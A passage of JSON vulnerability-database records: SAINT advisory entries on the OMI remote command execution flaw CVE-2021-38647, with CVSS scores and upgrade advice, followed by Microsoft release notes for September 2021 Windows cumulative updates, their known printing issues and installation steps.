"modified": "2021-09-28T00:00:00", "id": "SAINT:B21EB0CE85BB4A8171AF59A4CF014F01", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/microsoft_azure_omi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T15:53:10", "description": "Added: 09/28/2021 \n\n\n### Background\n\n[Microsoft Azure Open Management Infrastructure](<https://github.com/microsoft/omi>) is an open source project to further the development of a production quality implementation of the DMTF CIM/WBEM standards. \n\n### Problem\n\nA vulnerability in Open Management Infrastructure allows remote attackers to execute arbitrary commands by sending a SOAP `**ExecuteShellCommand**` request without an Authorization header. \n\n### Resolution\n\n[Upgrade](<https://github.com/microsoft/omi-kits/tree/master/release>) to Open Management Infrastructure 1.6.8-1 or higher. \n\n### References\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647> \n<https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-28T00:00:00", "type": "saint", "title": "Microsoft Azure Open Management Infrastructure remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-28T00:00:00", "id": "SAINT:E5FBEA63E5EE8A91F5066541141037D1", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/microsoft_azure_omi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-19T20:31:18", "description": "Added: 09/28/2021 \n\n\n### Background\n\n[Microsoft Azure Open Management Infrastructure](<https://github.com/microsoft/omi>) is an open source project to further the development of a production quality implementation of the DMTF CIM/WBEM standards. \n\n### Problem\n\nA vulnerability in Open Management Infrastructure allows remote attackers to execute arbitrary commands by sending a SOAP `**ExecuteShellCommand**` request without an Authorization header. \n\n### Resolution\n\n[Upgrade](<https://github.com/microsoft/omi-kits/tree/master/release>) to Open Management Infrastructure 1.6.8-1 or higher. \n\n### References\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647> \n<https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-28T00:00:00", "type": "saint", "title": "Microsoft Azure Open Management Infrastructure remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-28T00:00:00", "id": "SAINT:A224EF4FDA8E067B5A4576A0BC6D6F10", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/microsoft_azure_omi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2023-06-23T19:39:05", "description": "None\n**12/8/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1507 update history home page.\n\n## Highlights\n\n * Updates security for your Windows operating system. \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * This update contains miscellaneous security improvements to internal OS functionality. No additional issues were documented for this release.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of KB5005569 are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006675 \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of KB5005569 are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5007207. \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones.**Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006675. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions. If you are using Windows Update, the latest SSU (KB5001399) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005569>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005569](<https://download.microsoft.com/download/0/2/c/02c04258-371f-4004-a331-b8c5e28ca23f/5005569.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005569 (OS Build 10240.19060)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005569", "href": "https://support.microsoft.com/en-us/help/5005569", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:08", "description": "None\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue that causes Windows to generate many AppLocker or SmartLocker success events in the AppLocker EXE and DLL event channel. \n * Addresses an issue that prevents the ShellHWDetection service from starting on a Privileged Access Workstation (PAW) device and prevents you from managing BitLocker drive encryption.\n * Addresses an issue that causes PowerShell to create an infinite number of child directories. This issue occurs when you use the PowerShell **Move-Item** command to move a directory to one of its children. As a result, the volume fills up and the system stops responding. \nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>). \n\n### Windows 10 servicing stack update - 20348.220\n\nThis update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of KB5005575 are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note **The printer connection methods described in this issue are not commonly used by devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in KB5005619. \nAfter installing this or a later update, installation of printers using Internet Printing Protocol (IPP) might not complete successfully. Devices which had connected to and installed the printer prior to the installation of KB5005575 are unaffected and print operations to that printer will succeed as usual.**Note **IPP is not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006745. \nYou might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones.**Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006745. \nUniversal Windows Platform (UWP) apps might not open on devices that have undergone a Windows device reset. This includes operations that were initiated using Mobile Device Management (MDM), such as Reset this PC, Push-button reset, and Autopilot Reset. UWP apps you downloaded from the Microsoft Store are not affected. Only a limited set of apps are affected, including:\n\n * App packages with framework dependencies\n * Apps that are provisioned for the device, not per user account.\nThe affected apps will fail to open without error messages or other observable symptoms. They must be re-installed to restore functionality.| This issue is addressed in KB5015879 for all releases starting September 14, 2021 and later. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005575>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Microsoft Server operating system-21H2**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File Information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005575](<https://download.microsoft.com/download/4/d/c/4dc44ff9-41a1-4312-a033-b55efa9879ab/5005575.csv>).For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 20348.220](<https://download.microsoft.com/download/2/3/2/2326ef05-5b2e-4027-89cc-c33f991578bb/SSU_version_20348_220.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005575 (OS Build 20348.230)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005575", "href": "https://support.microsoft.com/en-us/help/5005575", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:02", "description": "None\n**11/17/20**For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>). **Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard. \n\n## Highlights\n\n * Updates security for your Windows operating system. \n\n## Improvements and fixes\n\n**Note **To view the list of addressed issues, click or tap the OS name to expand the collapsible section.\n\n### \n\n__\n\nWindows 10, version 21H1\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 20H2\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 2004\n\n**Note: **This release also contains updates for Microsoft HoloLens (OS Build 19041.1164) released September 14, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue that causes PowerShell to create an infinite number of child directories. This issue occurs when you use the PowerShell **Move-Item** command to move a directory to one of its children. As a result, the volume fills up and the system stops responding.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n### Windows 10 servicing stack update - 19041.1220, 19042.1220, and 19043.1220\n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nDevices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/en-us/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later.**Note **Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps. | To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:\n\n 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab &lt;destination path&gt;**\n 2. Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* &lt;destination path&gt;**\n 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.\nIf you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). \nAfter installing the June 21, 2021 (KB5003690) update, some devices cannot install new updates, such as the July 6, 2021 (KB5004945) or later updates. You will receive the error message, \"PSFX_E_MATCHING_BINARY_MISSING\".| For more information and a workaround, see KB5005322. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of KB5005565 are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note **The printer connection methods described in this issue are not commonly used by devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5005611. \nAfter installing this or a later update, installation of printers using Internet Printing Protocol (IPP) might not complete successfully. Devices which had connected to and installed the printer prior to the installation of KB5005565 are unaffected and print operations to that printer will succeed as usual.**Note **IPP is not commonly used by devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006738. \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones.**Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006670. \nUniversal Windows Platform (UWP) apps might not open on devices that have undergone a Windows device reset. This includes operations that were initiated using Mobile Device Management (MDM), such as Reset this PC, Push-button reset, and Autopilot Reset. UWP apps you downloaded from the Microsoft Store are not affected. Only a limited set of apps are affected, including:\n\n * App packages with framework dependencies\n * Apps that are provisioned for the device, not per user account.\nThe affected apps will fail to open without error messages or other observable symptoms. They must be re-installed to restore functionality.| This issue is addressed in KB5015878 for all releases starting June 21, 2021 and later. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.Prerequisite:For Windows Server Update Services (WSUS) deployment or when installing the standalone package from Microsoft Update Catalog:If your devices do not have the May 11, 2021 update (KB5003173) or later LCU, you **must **install the special standalone August 10, 2021 SSU (KB5005260).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005565>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005565](<https://download.microsoft.com/download/f/b/e/fbe0a64d-2558-48c0-b206-ad7185db9226/5005565.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.1220, 19042.1220, and 19043.1220](<https://download.microsoft.com/download/5/8/e/58e627eb-d91a-470b-a67b-8cdfddd9c71c/SSU_version_19041_1220.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005565 (OS Builds 19041.1237, 19042.1237, and 19043.1237)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005565", "href": "https://support.microsoft.com/en-us/help/5005565", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:03", "description": "None\n**8/24/2021** \n**IMPORTANT **Starting in October 2021, there will no longer be optional, non-security releases (known as \"C\" releases) for Windows 10, version 1909. Only cumulative monthly security updates (known as the \"B\" or Update Tuesday release) will continue for Windows 10, version 1909. \n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1909 update history home page.**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates security for your Windows operating system. \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue that causes PowerShell to create an infinite number of child directories. This issue occurs when you use the PowerShell **Move-Item** command to move a directory to one of its children. As a result, the volume fills up and the system stops responding. \nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device. For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n### Windows 10 servicing stack update - 18363.1790\n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. \n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of KB5005566 are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note **The printer connection methods described in this issue are not commonly used by devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5005624. \nAfter installing this or a later update, installation of printers using Internet Printing Protocol (IPP) might not complete successfully. Devices which had connected to and installed the printer prior to the installation of KB5005566 are unaffected and print operations to that printer will succeed as usual.**Note **IPP is not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5007189. \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones.**Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006667. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.Prerequisite:You must install the July 13, 2021 SSU (KB5004748) before installing the LCU. **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005566>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005566](<https://download.microsoft.com/download/3/9/1/391ffcb2-7fdf-47e1-97cd-fe18abaf022c/5005566.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 18363.1790](<https://download.microsoft.com/download/e/8/0/e8002328-8c8e-43f7-b25d-eb0bdf7c541b/SSU_version_18362_1790.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005566 